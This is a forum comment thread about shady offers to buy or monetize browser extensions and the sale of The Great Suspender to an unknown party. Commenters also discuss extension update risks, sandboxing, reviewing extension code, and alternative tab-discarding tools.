On a daily basis, I will get requests to sell the extension. Once or twice a week, I will receive an offer to add "a couple lines of code" to my extension which are always generously described as "allowed in the Chrome Web Store" by little fly-by-night organizations that only even have a landing page half the time and usually have throwaway-looking gmail accounts. Out of curiosity, I've asked a few what their code does and they never fully describe it, but it either collects analytics to ship home (my extension runs on all sites, so it's appetizing to them!) or places paid results at the top of any search results, for which I can make "thousands of dollars a month based on the number of North American users I have".
Here is an example email I received yesterday. It's a good example of how they call it "an SDK" and looks like one of the more legit ones (they registered a domain to send email from, at least).
We at [redacted] are considering purchasing the complete license and ownership of the extensions which have 50K+ active users, may I know if you would be interested in selling? If so, - what is your estimated price?
Regarding the SDK monetization which we discussed earlier, as it is not distractive and is compatible with any other monetization. We have straightforward terms and provide support for your users agreement. Our partners generate 3-20 K USD monthly with our solution for the browser extensions.
As a kind reminder, we are [redacted] — a reputable global peer-to-peer ethical proxy network. All our clients are big reputable companies, we authorize their business before providing any proxy plans.
Look forward to your further feedback and discussing further details of our financial proposal for your Software in a short Zoom call or here by emails.
First, respond to every inquiry by telling them the price is USD$70,000,000.00. And stick to that price. Many of these sleazy companies get their leads from the same "lead generators," who will eventually take you off their lists because they know your terms are unreasonable. It doesn't work for everyone, but when I did it to spammers trying to buy my mailing list, it significantly reduced the volume of inquiries.
Second, put a page on your web site listing all of the offending companies, with links to the letter you received.
Apr 1, 2021 - Company X promised $3-5k/month if I alter your search results. Link.
Apr 3, 2021 - Company Y promised $1-5k/month if I promote thier product on other people's web pages. Link.
A lot of people on HN will claim "O, noes! Lawyers! Libel!" I wouldn't worry about it. These people don't have the money for lawyers, are usually in geographies without legal systems, and don't want their names and other information exposed in a public legal filing. Plus, all you're doing is stating facts.
There's a W C Fields joke that ends, "Madame, we've already established what sort of woman you are, now we're just haggling over price."
Libel is for false statements. If you've got a real email from the company then it's not false.
In my opinion extensions have to be one of the worst sources of spyware these days. I am now extremely conservative with what extensions I use, and definitely would only use extensions from open source projects or companies that I trust.
Something needs to change. As long as extensions have such weak sandboxing along with such poor app review, Google/Mozilla etc will keep willingly shipping spyware unbeknownst to their users.
At least some mechanism of creating and verifying reproducible builds would go a long way.
I completely agree. There are a number of features I would really like to use in Firefox that are available only as extensions and I continue to resist installing them.
In fact, the only extension I use is uBlock origin - which is based on a fairly rich social and community history behind that project and its author ...
Paying $0.20 per user to buy that seems extremely low.
Also, on the sandboxing/app review of extensions, does anybody know how well Apple vets Safari extensions? (I guess that could be hard if the evil parts are time-triggered, certainly if the code also is obfuscated (possibly in the name of minification)
I feel like this is another prong in the story about threats to sustainability of open source done the way it used to/has been done previously.
It is. It’s very easy to generate big money with ad replacement or proxies.
Eventually the photo hosting service itself solved the problem that my extension was solving, but pretty much everyone who'd installed the extension still had it installed.
At some point, a company offered to buy it from me for a couple thousand dollars -- I was 18, and it seemed like a miracle! They asked me to add some code to the extension, and I assumed their intentions were good. I added their code, which I now realize was some sort of tracking/advertising program...and my extension promptly got taken down by Google.
Quite the learning experience!
Say, $5 per active user; non-exclusive license: I can maintain my fork of the extension, and use any of the code in new projects.
Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.
Rhetorical questions: Do you want to support this thing? How much time does it take? Is this effort you want to spend? Are you not monetising this for a purpose? Are you happy with that purpose (obviously yes)? Do you still enjoy spending time on it? Do you see that time as well spent? Are the expectations from your side still being met? Are the expectations from everyone else still reasonable?
After all those questions, the basic answer is probably: you don't want to monetise it because it will wreck the actual purpose for which its intended or alternatively there isn't much of monetisation possibility due to its nature. But you can't spend more time on it because you have other Things to Do, like making money from other ways.
(At least this is my impression based on my experience)
Aww man, I'm really sad to here that RecipeFilter won't be coming to Safari anytime soon. I really got my hopes up after it was in the keynote!
Since Apple distributes extensions in the App Store, have you though about charging a buck or two for the Safari version? I know everyone says this, but I'd pay...
Do they ask you to do that for free or is there a monetary amount they tack on?
Once you burn your reputation by "selling out" the first time. Who will trust your new forked version?
https://chrome.google.com/webstore/detail/recipe-filter/ahlc...
This is what capitalism looks like, folks. Someone "built it" so they now privately "own it", no matter how big it gets. It's not put into the hands of an organization. The profit motive is quite strong, which is why someone can be "corrupted" by very tempting messages like this. If you had a lake or a forest privately owned by one or two people, and they had a lot of debts, they could easily sell it to polluters and loggers.
Some people scoff and say "socialism has been tried, it never works." I admit that socialism simply trades one class of elites (the capitalists with a lot of shares) for another (the bureaucrats with a lot of political clout). BUT! I would like to say that socialism is not the only alternative. The other alternative is decentralized systems with no private ownership. I'm talking about science, open source software, and so on. There can be a Merkle tree of version updates (e.g. git version control) and each one can have various reputable organizations (like Zagat for software) building their reputation vetting it. Then, each community would run their own app store (think Wordpress plugins) which would work with these reputable organizations. There would be no heroes, no celebrities, no tweets at 3 am to 5 million people, no pulling from repos without peer review, no scientists instantly believed after publishing on arxiv.org .
Congratulations for building a popular extension, fancy_pantser. You live in a world where you it's really bad to "criticize the profit", and where building it means you are responsible for it no matter how big it gets, but then we are all depending on your integrity and ability to rebuff life-changing amounts of money to not mine our data. We can pass laws to punish people after the fact, or we can gradually change our culture by rejecting "immediate gratification" of updates that are not vetted, just as corporations have done with bleeding edge vs stable Linux distros etc. Unfortunately, the Web has made it so that anything can be updated at any time, with no sysadmins or reviewers in the loop. It's a wonder more malware isn't silently everywhere already.
aka anarchy. that turns out to be worse.
The cost of using this extension is your information, and there are other products available that do the same thing at a lower cost. Based on the most fundamental concept of economics (supply and demand), "The Great Suspender" should fail as a product very quickly.
There's a sensible middle ground here. Take the paternalistic approach that (generally) protects people like my mum. Add settings that allow people like you and me to turn off updates or roll backwards. Push the people controlling the updates (like the Chrome store) to better protect their users.
Vetting could be better with a lot of companies as well; remember not so long ago when Windows Defender decided a critical system file was malware and broke a ton of systems?
Verification. Vetting. Gradual release. Automatically disable extensions if they changed ownership, or if there's suspicious activity on the account of the owner (e.g. new login in another country).
And they need to take a MUCH harder stance on malware. Right now they're not even acknowledging there's a problem, let alone acting on it.
I have plenty of things I want to complain about when it comes to Google's user-adversity but mandatory automatic updates is definitely not one of them.
If you're a technical user and really know (or really think that you know) what you're doing there are ways to effectively freeze a given version of an extension.
Download and unpacking from github is a pita, I'd need to do this to each of my computers seperately
Switch to Chromium and use a package manager to stay up to date. Don't freeze updates, especially on your browser.
Or not use chrome
Chrome has features to dissuade users from installing extensions from outside the Chrome Web Store. If you load an unpacked extension, Chrome will issue an ominous warning (something like “this extension is untrusted, click here to uninstall”) on every launch.
One could argue this is for security, but this change was implemented around the same time that Google disabled the ability to self-host extensions that install into Chrome. Really this is a mechanism to shut out independent extension developers from any potential plausible third-party distribution method that doesn’t rely on the Chrome Web Store (which Google controls and aggressively moderates.)
Use Firefox.
Firefox has similar restrictions... you have to side load through Developer Options. If you’re not a developer, you will be questioning why you’re doing this and the less-technically inclined will simply never do it (like my wife)
And it is not entirely nefarious as you suggest. It limits the damage that sideloaded extensions did roughly 2010 and earlier. The WebExtension API was another assault on extensions. These days, chrome and Firefox have essentially closed a huge attack vector even though extensions are a shadow of their former selves. I was a skeptic for a long time (why should power users pay for the faults of everyone else?) but no more. Kudos.
Availability is part of security, and the most secure system is disconnected from the internet and powered off. Why are we cheering our software becoming less useful in the name of safety? The switch to WebExtensions was a monstrous loss of functionality!
Firefox also permits self-hosting extensions signed through their store, providing more freedom for extension developers.
I'm not sure what screen "Developer Options" is referring to, but you can load add-ons directly from your hard drive with no fuss from the Add-ons page (though you must be running the Nightly or Developer version of Firefox). Click the gear icon right above your list of installed add-ons (this is also the menu that lets you disable auto-updates).
* Unless it was explicitly revoked (updates do not revoke the signature) or Mozilla broke something that affects everything.
That's google's shtick. They do the same if you unlock bootloader on your android phone. Black nag screen with scary text on every reboot.
I've been sideloading vimium and thegreatsuspender for years and I haven't seen this message ever. Not on Mac nor Linux.
Extensions these days go through a rigorous review process, and Google regularly shuts down / imposes arbitrary restrictions against extensions due to changing policies.
I understand the importance of strong moderation to protect users from malicious extensions, but I believe Google is using that as an excuse to further lock down their store, increasing barriers to entry and making it harder for developers to build software to extend the most popular browser in the world without Google's blessing.
I routinely research several related topics for a project, and I will need 10-30 tabs per topic open at once. Surprisingly, chrome manages to handle 100+ tabs on my system with out issue.
You should see my desktop
For example, last week I was shopping for a very specific, very expensive ceramic thrust bearing. I had 20+ pages open from 10+ suppliers and documentation sources. I needed those open all week while we decided on which one to buy. This was a minor background task, so I also had 60 other tabs open for my normal work flow.
Just because people use a tool differently than you doesn't make them wrong.
Back in the days of social bookmarks (like del.icio.us) pretty much everyone had a "toread" folder. The main problem is that you have to remember to delete them after reading them. That's not really a problem for good articles you remember reading, but the crap articles you don't remember, or quit reading are easy to forget to delete from the bookmarks. So, you end up reading the same crap articles several times. With a tab, you close the window and you're done. With bookmarks, you have to close the window, go through your bookmarks, find the one that was crap that you have already forgotten and delete it.
There's several other advantages to tabs too:
Like the fact that they're naturally organized by window based on the task you're doing.
You'll see them more often, and thus be reminded more often.
They save context, like forwards and back history, and information you may have typed in, or a UI you may have manipulated.
- Auto Refresh Premium, static.trckljanalytic.com
- Stream Video Downloader, static.trckpath.com
- Custom Feed for Facebook, api.trackized.com
- Notifications for Instagram, pc.findanalytic.com
- Flash Video Downloader, static.trackivation.com
- Ratings Preview for YouTube, cdn.webtraanalytica.com
Copied from https://github.com/greatsuspender/thegreatsuspender/issues/1...
Another loser in this whole game is the honest hobby extension developers, who have to deal with the power-users who might promote their extensions not wanting to bother for fear of not being able to keep a watch for potential malicious updates for all of them.
Saw your article via HN.
As an easier permanent fix, just uninstall The Great Suspender and install Auto Tab Discard (https://add0n.com/tab-discard.html). It does the same thing.
It's available on:
Firefox - Auto Tab Discard – Get this Extension for Firefox (en-US)(https://addons.mozilla.org/en-US/firefox/addon/auto-tab-disc...)
Edge - Auto Tab Discard - Microsoft Edge Addons (https://microsoftedge.microsoft.com/addons/detail/auto-tab-d...)
or even if you're still using Chrome - Auto Tab Discard - Chrome Web Store (https://chrome.google.com/webstore/detail/auto-tab-discard/j...)
From the website it sounds like the favicon is changed. So the tab doesn’t go away it’s just on pause
Google: “ a discarded tab doesn't go anywhere. We kill it but it's still visible on the Chrome tab strip. If you navigate back to a tab that's been discarded, it'll reload when clicked. Form content, scroll position and so on are saved and restored the same way they would be during forward/backward tab navigation.”
In the future this will be updated to also use a serializer for discarded tabs.
Tab discarding is just a more efficient, native implementation of what Great Suspender aimed to do in the first place.
So it's not that auto-update is flatly a bad idea, it's more that it's a trade-off that sometimes makes security issues almost evaporate, and sometimes makes them impossible to dodge.
What are the odds of one dependency being taken over by a shady anonymous entity?
While researching, I found many users reporting that forced updates of software installed by Snap caused many problems and I decided against using it; I was able to install Certbot via a good old-fashioned RPM from EPEL.
I also removed Snap from a different Ubuntu server which had recently been upgraded to 20.04 (I wasn't using LXD on that server so there was no need for it).
1. https://community.letsencrypt.org/t/how-to-install-certbot-w...
FWIW, I've been allowing Apt and Yum package managers to automatically update for about 8 years without any problems. The only manual OS updating I do is for a set of physical (non-virtual) servers that are operational 24/7.
Edit: OneTab[2] is also pretty good when you have lots of tabs open for research or work.
I used to use TGS excessively and TabsOutliner has completely changed my workflow. Now I just sort tabs into categories and then kill the entire window until I am in that context.
It sorta looks dated, but I find it amazing:
https://chrome.google.com/webstore/detail/tabs-outliner/eggk...
[0] https://github.com/greatsuspender/thegreatsuspender/issues/1...
Sharing bookmarks, is not the same as "sharing it with anyone in the world" - without any notification.
It is really a shame that basic functionality like this isn't built into more browsers and we have to rely on extensions to fill the gaps just to keep memory usage under control for tab-a-holics like myself. :(
chrome://discards/ has some advanced options (in Chromium-based browsers).
Funnily enough, Google mentions The Great Suspender as inspiration for this feature in the August 2015 changelog: https://developers.google.com/web/updates/2015/09/tab-discar...
> We actually had a great chat with the author of the Great Suspender extension while developing tab discarding and they're glad to see us natively tackling this problem in ways that are more efficient than an extension might be able to, such as losing the state of your user inactions.
I still sometimes use extensions like Great Suspender to give more control over the process (e.g. to suspend more aggressively on RAM-constrained machines or where the user uses a lot of tabs).
Since this news came out I have switched to "Auto Tab Discard".
The way I see it, extension developers get to come up with innovative new features first, and then the first-party vendors like Apple, Google, and Microsoft take note and eventually do just that: Integrate it into their own products.
For example: The Great Suspender → Sleeping Tabs [experimental] (Microsoft/Edge); Flux → Night Shift (Apple/iOS); Growl → macOS Notifications (Apple/macOS); Swype → iOS Built-in Keyboard (Apple/iOS); etc
Edit: Fix formatting.
Now that I write that, I'm not sure how permissions and upgrades go together. If an extension that had tight permissions relaxes them I'd get notified before they took effect, right?
It's by the same dev too but it uses Chrome's Native Tab Discarding feature and I found it way more efficient (at the time I started using it a few years ago - haven't compared recently).
[1] https://chrome.google.com/webstore/detail/the-great-discarde...
It would be an interesting exercise to try and build an open source organisation around developing and publishing extensions in the open.
Package managers are nice for the lazy, but then we get stuff like this:
https://qz.com/646467/how-one-programmer-broke-the-internet-...
Actually you might be pulling a bunch of malicious updates in 2-3 modules deep in your dependency tree anytime.
As a society we should be moving away from a culture of “immediate” updates eg on Twitter etc. And go towards more “peer review” like in science. Otherwise we are putting responsibility on every individual to verify all sides of the story and get informed. They don’t and society gets more and more dicided. Imagine if a scientist tweeted at 3am and half their followers instantly believed them. Or if an open source contributor’s pull request was instantly accepted and pulled overnight by everyone. That’s why USA and other countries are now so divided politically. Individual responsibility of 100% of the downstream nodes is strange to outsource responsibility to.
I wrote about this back in 2012 predicting what would happen:
What happened to the notion of using stable, centralized package repositories like Debian’s or Red Hat’s in order to build one’s software? I did a lot of Free Software development in the early millennium, then was away from the scene for a few years, and when I came back this desire for convenience above all else really baffles me.
https://qbix.com/blog/2021/01/15/open-source-communities/
https://qbix.com/blog/2018/01/17/modern-security-practices-f...
I'm now framing the problem as "inauthentic speech".
> ...go towards more “peer review” like in science.
Ditto journalism and reporting.
This is a universal problem. The core solution remains the same.
Cite your sources
Show your work
Sign your name
Further, every trusted digital relationship would start with a key exchange. Vs relying on username and password. eg Banks would issue me a Secure Enclave of some sort, like a USB fob.
I'd like to understand why this didn't happen. My best guess is "Worse is better" enabled predators and parasites. Which has been acceptable during the gold rush.
> Pray that the shady developer doesn’t issue a malicious update to The Great Suspender later. (There’s no sensible way to disable updates of an individual extension.)
Does Debian ship packages for individual browser extensions?
I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
On the other hand, all these app delivery systems are so damned pernicious and require constant vigilance. We may have arrived at a moment in time where this is actually a difficult decision:
* pay somebody a living wage to burrow down into Debian's WoT bureaucracy and add at least a selection of this functionality without phoning home
* continue playing the most tedious game of whackamole with a whackamole game that mines all our data in order to learn how best to beat all users at whackamole
They do, for a couple of more notable ones (HTTPS Everywhere, uBlock Origin, Proxy Switcher, etc.) [0]
> I mean, if they do I'm sure it's not scalable and-- after spending time reading debuild manual-- a giant, archaic pain in the ass.
The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.
[0] https://packages.debian.org/search?keywords=webext-&searchon...
> The biggest problem is to find a person to be a maintainer that is willing to keep up with the upstream development.
That sounds like the kind of job someone does in return for money.
Edit: looks like it works in Chrome as well.
Quite similar to what happened to Nano Adblocker/Defender a few months ago.
Whether they are lowballing candidates with that offer, I can't say.
Actually it does appear that the owner was changed from "deanoemcke" to "thegreatsuspender" (the new mystery owner) on the Chrome Web Store page.
I agree that warning when updating an extension if the stated owner has changed would be valuable.
Workaround to reopen a page is just to cut'n'paste the original URL from a parameter at the end of the TGS URL.
For dev tools and such, I set a whitelist of the sites they're allowed to run on, using that same extension details page. There's no need for your JSON formatter etc. to run on every single page you visit. Also speeds up browsing.
That's something that worries me, whenever I install a software with trusted privileges.
Software companies can sell their products -- and user base -- to other companies without notice.
And it can be even worse in the free software world: think about all the updates that happen when you type `apt-get|yum|brew|npm|pip update`. What are the odds of a single dependency being taken over by a shady anonymous entity?
You’ve Changed: Detecting Malicious Browser Extensions through their Update Deltas
The review doesn't take much time. What I look for:
1. The manifest for what network endpoints the extension is allowed to call.
2. Any URL in the code that is external to the extension.
3. Any remote network function (fetch/XHR/links) and traceback to the call sites.
4. Whether there is any obfuscated code or not.
Takes a few minutes, but catches most of the threat vectors. Skimming the code also gives me a sense of what sort of developer is behind the extension. Some code clearly shows a developer cares about privacy and / or security, which unconsciously adds karma for that dev in my book.
Like others above, I don't use many extensions, but those I use I have to trust.
https://www.windowscentral.com/microsoft-edge-canary-can-put...
Are there any potential downsides to this? I was also curious how does loading this format avoid updates?
TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.
Did I miss anything?
[0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...
Google never really cared about user privacy at all.